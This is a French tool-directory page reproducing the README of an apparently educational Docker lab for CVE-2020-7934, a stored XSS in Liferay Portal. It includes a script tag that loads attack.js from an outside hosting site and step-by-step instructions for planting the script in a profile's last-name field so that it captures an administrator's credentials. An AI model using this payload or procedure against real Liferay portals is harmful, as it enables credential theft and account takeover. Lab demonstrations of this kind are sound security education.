Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
audit-xss-cve-2020-7934 — Exploit XSS basé sur Docker pour CVE-2020-7934 ciblant le portail Liferay. Démontre un cross-site scripting stocké via les champs de profil utilisateur pour voler les identifiants administrateur. | Kitploit
Outils/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

Exploit XSS basé sur Docker pour CVE-2020-7934 ciblant le portail Liferay. Démontre un cross-site scripting stocké via les champs de profil utilisateur pour voler les identifiants administrateur.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 4 ansPas encore vérifié

CVE 2020-7934

Comment exécuter cette CVE

Prérequis

  1. docker

Remarques

Il est possible de mettre le script d'attaque en ligne (via le code js) http://yourjavascript.com/ Notre script Js en ligne pour l'attaque html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Commandes de configuration

  1. allez dans le dossier racine de ce projet
  2. exécutez « sudo docker-compose up --build »
  3. nouveau terminal : exécutez « docker inspect liferay » ==> et copiez la valeur IPAddress
  4. nouveau terminal : exécutez « python api_attacker.py »
  5. ouvrez un navigateur et allez sur « http://IPAddress:8080 » ==> vous devriez obtenir le portail liferay en réponse
  6. pour arrêter et supprimer les conteneurs, utilisez « sudo docker-compose rm »

Instructions pour l'attaque

  1. Inscrivez-vous dans liferay en tant qu'utilisateur, connectez-vous, et dans la section « sites disponibles », rejoignez le site « liferay ».
  2. Modifiez le « nom de famille » dans un script JS (directement () ou via un « src = » http ... "")
  3. Connectez-vous en tant qu'admin liferay (nom d'utilisateur : [email protected], mot de passe : test)
  4. Allez dans les sites disponibles et cliquez sur « liferay », la page publique de ce site s'ouvrira.
  5. Allez sur la nouvelle page, un menu s'ouvrira sur la droite, cliquez sur mermbership.
  6. Sélectionnez l'utilisateur enregistré à l'étape 1. À ce moment, le script sera exécuté. 5.1) Dans le script attack.js, la page demandera les identifiants.
  7. Dans le terminal de l'étape 5 (des Commandes de configuration), le nom d'utilisateur/mot de passe saisi en 5.1 (par l'admin) )
Télécharger l’outil